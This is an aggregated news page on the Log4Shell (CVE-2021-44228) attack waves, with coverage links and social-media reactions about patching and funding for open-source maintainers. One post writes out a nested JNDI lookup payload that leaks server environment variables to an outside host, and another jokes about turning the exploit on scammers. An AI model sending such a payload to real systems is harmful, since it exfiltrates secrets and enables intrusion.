Researchers spot waves of attacks targeting unpatched Apache servers with the Log4j bug, exfiltrating data, spreading botnets, installing crypto miners, more
Threat actors and researchers are scanning for and exploiting the Log4j Log4Shell vulnerability to deploy malware or find vulnerable servers.
BleepingComputer · Lawrence Abrams
Related Coverage
- The Internet's biggest players are all affected by critical Log4Shell 0-day Ars Technica · Dan Goodin
- Inside the Log4j2 vulnerability (CVE-2021-44228) The Cloudflare Blog · John Graham-Cumming
- RHSB-2021-009 Log4Shell - Remote Code Execution - log4j Red Hat Customer Portal
- Microsoft's Response to CVE-2021-44228 Apache Log4j 2 Microsoft Security …
- BlueTeam CheatSheet *Log4Shell* | Last updated: 2021-12-12 2204 UTC Gist · SwitHak
- Threat Alert: Log4j Vulnerability Has Been adopted by two Linux Botnets 360 · RootKiter
- Logout4Shell — A vulnerability impacting Apache Log4j versions 2. through 2.14.1 was disclosed … GitHub · Cybereason
- Companies Rush to Fix Software Exploit After U.S. Warning Bloomberg · Jack Gillum
- Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk The Hacker News · Ravie Lakshmanan
- Log4Shell & massive Kinsing deployment ProferoSec · Yuval Fischer
- Security Advisory Summary SolarWinds
- What is Log4Shell, and why are we panicking about it? — Find out what the Log4j2 Log4Shell panic … ComputerWeekly.com · Alex Scroxton
- ‘Log4j flaw can potentially affect 3 out of 10 websites across globe’ TechCircle · Shouvik Das
- Log4Shell flaw: Government asks organisations to check server security Silicon Republic · Vish Gain
- Log4Shell attacks are spreading fast after flaw exploited TechRadar
- ‘Vaccine’ against Log4Shell vulnerability has potential — and limitations VentureBeat · Kyle Alspach
- 👋 Introduction — It's almost the end of 2021. Three strong years of pandemic, and there's no good end in sight. Software Kills · Stojan Dimitrovski
- Logging library for millions of apps has a serious vulnerability Engadget · Mariella Moon
- Microsoft: Log4j exploits extend past crypto mining to outright theft VentureBeat · Kyle Alspach
- Bluepurple Pulse: Log4J2 / Log4Shell Special Cyber Defence News … · Ollie
- Important Message: Security vulnerability in Java Edition Minecraft
- Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation Microsoft Security Blog
- ‘The Internet Is on Fire’ — A vulnerability in the Log4j logging framework has security teams scrambling to put in a fix. Wired · Lily Hay Newman
- “Open source” is not broken Blog on Kailash Nadh
- Log4Shell Hell: anatomy of an exploit outbreak Sophos News · Sean Gallagher
- The Log4j bug exposes a bigger issue: Open-source funding TNW · Ivan Mehta
- Statement from CISA Director Easterly on “Log4j” Vulnerability CISA
- Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228) LunaSec Blog
- Calculating my open source blast radius ENOSUCHBLOG · William Woodruff
- “Open Source” is Broken Xe's Blog
- VMSA-2021-0028.1 … 1. Impacted Products (Under Evaluation) — VMware Horizon VMware
- Log4Shell: Reconnaissance and post exploitation network detection NCC Group Research
- “Open source” is not broken OSnews · Thom Holwerda
- Log4js project sponsorship skyrockets after critical bug exploitation iTnews · Juha Saarinen
- Log4Shell exploit found to impact iCloud, amongst other services iThinkDifferent · Imran Hussain
- ZAP and Log4Shell — Overview — A vulnerability has been found in Log4j which can result … zaproxy.org
- iCloud Log4j vulnerability was fixed quickly: researchers demoed it when connecting to iCloud via the web on Dec. 9 and 10, but by the 11th it no longer worked The Eclectic Light Company · Hoakley
- Security flaw in widely-used logging system impacts Minecraft, iCloud, more MobileSyrup · Jonathan Lamont
- On Paying Open Source Maintainers Nadim Kobeissi
- Log4j zero-day flaw: What you need to know and how to protect yourself ZDNet · Liam Tung
- Apache Log4j Vulnerability N-able
Discussion
-
@campuscodi
Catalin Cimpanu
on x
Log4Shell attacks began two weeks ago, Cisco and Cloudflare say - 4 major botnets spotted abusing Log4Shell right now (per Netlab) - more than 10k hosts scanning for it (per Kryptos Logic) - DDoS, crypto-miners, and CS beacons as payloads for now https://therecord.media/... https://…
-
@girlgerms
@girlgerms
on x
Some great information and guidance from Microsoft around Log4j: https://msrc-blog.microsoft.com/ ... https://www.microsoft.com/...
-
@p_malynin
Pavlo Malynin
on x
The #log4j exploit is so awesome I had to log onto my twitter for the first time in years. I have found the perfect weapon to fight iMessage and SMS scammers #Log4Shell https://twitter.com/...
-
@brunoborges
Bruno Borges
on x
So many great people worked tirelessly to get this out. Several hours, late meetings, calls, emails, chats and so on. Proud of everyone! #OneMicrosoft https://twitter.com/...
-
@yazicivo
@yazicivo
on x
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people from bashing us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. htt…
-
@filosottile
@filosottile
on x
This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage. “I work on Log4j in my spare time” “always dreamed of working on open source full time” “3 sponsors are funding @rgoers's work: Michael, Glenn, Matt” People, what are we doing. h…
-
@steveruizok
Steve Ruiz
on x
I get about $2,000 a month from GitHub sponsors. Let's talk about funding for open source projects, specifically my thoughts for @tldraw. https://twitter.com/...
-
@lorenc_dan
Dan Lorenc
on x
This is going to sound blunt, but it's a distribution problem not a funding problem. $ is easy. Corporations have budget and are willing to spend, but it takes too much time. Finding projects that need help and maintainers willing to help in exchange for money is hard. https://tw…
-
@matthew_d_green
Matthew Green
on x
Watching this log4j bug metastasize, I'm seeing people ask why industry doesn't fund open source. I don't have a great answer, but I have some thoughts following the experience with Heartbleed in '14. 1/
-
@malwaretechblog
Marcus Hutchins
on x
This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.
-
@filosottile
@filosottile
on x
No one is paying the log4j2 maintainers!? There is a whole page on the responsibilities of a @TheASF “Project Management Committee”... AND NO ONE IS PAYING THEM? https://www.apache.org/... Open Source needs to grow the hell up. Yesterday. https://twitter.com/...
-
@campuscodi
Catalin Cimpanu
on x
The Apache Log4j project is maintained by three people who are volunteering their spare time. Please don't be a jerk to them because multi-billion dollar companies are using their tool without even bothering to throw $1,000 their way. https://twitter.com/...
-
@minecraft
@minecraft
on x
Player safety is the top priority for us. Unfortunately, earlier today we identified a security vulnerability in Minecraft: Java Edition. The issue is patched, but please follow these steps to secure your game client and/or servers. Please RT to amplify. https://www.minecraft.net…
-
@tha_rami
Rami Ismail
on x
Oh gosh, just reading up on this exploit and this is wild. An open source Java logging tool used in all sorts of stuff from Minecraft to government databases alike has an exploit that allows attackers to execute code or read server variables. https://twitter.com/...
-
@jj_ranalli
Jjacopo.Eth
on x
DAOs were literally born to solve this Thinking of building a tool for DAOs to fund open source projects on @github and handle treasury through @juiceboxETH Someone stop me (or join me) https://twitter.com/...
-
@chr1sa
Chris Anderson
on x
Interesting that “supply chain vulnerabilities” have become a crisis in both the physical world and the web (open source library dependencies) at the same time. The perpetual pendulum between distributed and centralized will now swing back to the latter https://www.wired.com/...
-
@stevesi
Steven Sinofsky
on x
Professional Maintainers: A Wake-Up Call https://blog.filippo.io/... // This was bound to get written, but some are probably surprised it took two decades as they were saying it way back then.
-
@lzsthw
Zed A. Shaw
on x
PSA Time Folks: https://www.minecraft.net/... If you run a Minecraft server or the client (Java edition) then you need to read this and do some work. The recent log4j vulnerability is exploitable and will cause you pain. https://cve.mitre.org/...
-
@lessin
Sam Lessin
on x
but the real answer is crypto... totally right problem to identify but invoicing companies for maintaining open source software is lol. https://twitter.com/...
-
@matthew_d_green
Matthew Green
on x
@mistersql @JRossNicoll It takes lack of attention. In Heartbleed, someone merged a dumb feature quickly without doing careful code review. In log4j someone merged a dumb feature that any security expert would have recoiled at.
-
@seldo
Laurie Voss
on x
Open source spent the 1990s trying to convince corporations they could trust it, the 2000s delighted at its success in corporations, the 2010s begging corporations to help pay for the enormous maintenance costs being shouldered by random individuals. https://twitter.com/...
-
@bmgnrs
Andreas Baumgartner
on x
“This person's spare time passion project is responsible for half of the internet working the way it should. Vulnerable companies to this issue included Apple, Google, my cell phone carrier and everyone that uses JavaEE in its default configuration.” https://christine.website/...
-
@andreabarisani
Andrea Barisani
on x
Millions of $$$ are floating around bug bounties which do very little in fixing the underlying core issues we face. Yet critical dependencies which are everywhere struggle in getting adequate backing, only hostility when they break. Pay maintainers, pay proper security audits. ht…
-
@lets4r
Romain Rastel
on x
Once again, an Open Source Software maintained by a few people in their spare time, used by a lot of companies on their projects, has a big vulnerability. When will companies understand that it's in their interest to support OSS financially? https://twitter.com/...
-
@cisagov
@cisagov
on x
We urge all organizations to review the latest current activity alert and upgrade to Log4j version 2.15.0, or apply the appropriate vendor recommended mitigations immediately: https://www.cisa.gov/...
-
@matthew_d_green
Matthew Green
on x
When Heartbleed dropped, it was very similar to log4j: an underfunded OSS project (OpenSSL) that nobody thought about, but was *everywhere*. It took everyone by surprise, and even woke industry up. The result was a surge of funding. 2/
-
@gossithedog
Kevin Beaumont
on x
Okta RADIUS and MFA server are vulnerable and exploitable and need upgrading ASAP https://sec.okta.com/... https://twitter.com/...
-
@zakjan
@zakjan
on x
Open source maintainer as a career path. There are just a few companies who understand the benefits of funding open source development, and it's challenging to keep explaining that to others. Luckily I was able to find some already. Thanks for that! https://twitter.com/...
-
@gossithedog
Kevin Beaumont
on x
Log4j recap - two random unpaid folk maintain the code - a random requested the vuln/feature in 2013 - major IT and security vendors rely on that code - problem was publicised by teens in Minecraft video game - scope of problem still unclear days later https://twitter.com/...
-
@filosottile
@filosottile
on x
We all agree the status quo is unsustainable. Here are 1,000 words on how we could get the role of Open Source maintainer to graduate to a real, properly paid profession. The thing is, companies need it as much as maintainers do. https://blog.filippo.io/...
-
@jimj_candid
@jimj_candid
on x
When people say “you didn't build that” they're not just talking about how highways and public education contribute to corporate success. They're also talking about this. Open source is the vital foundation of nearly every corporate software asset. And it gets no respect. https:/…
-
@cisajen
Jen Easterly
on x
🚨All orgs should upgrade to log4j version 2.15.0 or apply appropriate vendor recommended mitigations ASAP! Read my full statement on this vulnerability: https://www.cisa.gov/... https://twitter.com/...
-
@laughing_mantis
Greg Linares
on x
PSA: attackers aren't just using #log4j attacks on internet facing devices. Groups I'm monitoring are going back to compromised networks and using it on subnets and on internal devices *very* successfully. Insider threat is also a viable avenue of exploitation.
-
@eastdakota
@eastdakota
on x
Seeing attackers exploit #Log4J to drop #Mirai. Bigger, badder botnets coming soon... 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖
-
@caseyjohnellis
Cje
on x
hearing folks compare #log4shell is “as bad as heartbleed” - imo it's much, much worse. aside from having RCE as the impact, the number of interdependencies around log4j (and particularly the age of them) is orders of magnitude higher
-
@felipecsl
Lima.Eth
on x
“open source is broken” https://christine.website/... - couldn't agree more. That's one of the reasons why I've stopped doing it myself. Unfortunately that's what we need to do in order to raise awareness to the issue that people need to be compensated for their work.
-
@runasand
Runa Sandvik
on x
Reminder that a lot of the technology we use relies on free, open source code that no one's paid to maintain. https://twitter.com/...
-
@chromatic_x
@chromatic_x
on x
Controversial opinion: RedHat, AWS, GCP, GitHub, NPM, etc should pay F/OSS developers. https://blog.filippo.io/...
-
@milesmccain
R. Miles McCain
on x
The world would be so much better off if maintaining open source software were a viable profession. One day...? https://twitter.com/...
-
@mattficke
Matt Ficke
on x
Endorse all this. There are a ton of engineers, of all experience levels, who would jump at the chance to do this kind of work if they could make a stable career out of it. https://twitter.com/... https://twitter.com/...
-
@joshuapowell_io
Joshua Powell
on x
I love when people share ideas like this, especially when they're backed by current events #opensource https://blog.filippo.io/...
-
@pixeltrix
Andrew White
on x
This is well-intentioned but saying “companies are in the business of getting what they need—by paying invoices” show incredible naivety in how bad companies are at paying their invoices https://blog.filippo.io/...
-
@oerdnj
@oerdnj
on x
This! I am thankful to all GitHub Sponsors and Patreons, but without my day2day job @ISCdotORG (which is thankfully also working on Open Source), I would be able to sustain my family. https://twitter.com/...
-
@adamwathan
Adam Wathan
on x
Great post — charity-based open source is very naive and unrealistic, if only because it's 100x more complicated for a business to pay someone for nothing than it is for something. https://blog.filippo.io/... https://twitter.com/...
-
@_staticflow_
Tanner Barnes
on x
In case anyone hasn't discovered this: the Log4J formatting is nestable, which means payloads like ${jndi:ldap://${env:user}.xyz.collab.co m/ a} will leak server side env vars!
-
@matthew_d_green
Matthew Green
on x
As a follow-up: @FiloSottile has a nice post about professionalizing the role of OSS maintainer. This is great! But I would still argue that money is finite, and knowing which projects need help is a basic missing ingredient. https://blog.filippo.io/...
-
@mcafee
@mcafee
on x
Have you heard about the security risk that is affecting popular websites, services, apps, and even games? Twitter, iCloud, Steam, and Minecraft servers may be vulnerable, along with a growing number of others. Here's what's going on and how to stay safe: https://www.mcafee.com/.…
-
@k8em0
@k8em0
on x
Blessed be the open source maintainers, for they shall inherit...Internet pile-ons?!? Hey, go easy on these folks who hold up the world on their backs. They deserve our support & respect, all the more during a crisis. Let's not turn already thankless work into more punishment. ht…
-
@eastdakota
@eastdakota
on x
Earliest evidence we've found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don't see evidence of mass exploitation until after public disclosure.
-
@bushidotoken
@bushidotoken
on x
The #Kinsing and #Muhstik cryptomining botnets are some of the first to exploit any new RCE vulnerability: this time it's Log4j & Log4Shell. Those two names have cropped up for several major RCEs this year, they've actually become one way to tell how bad a new RCE is.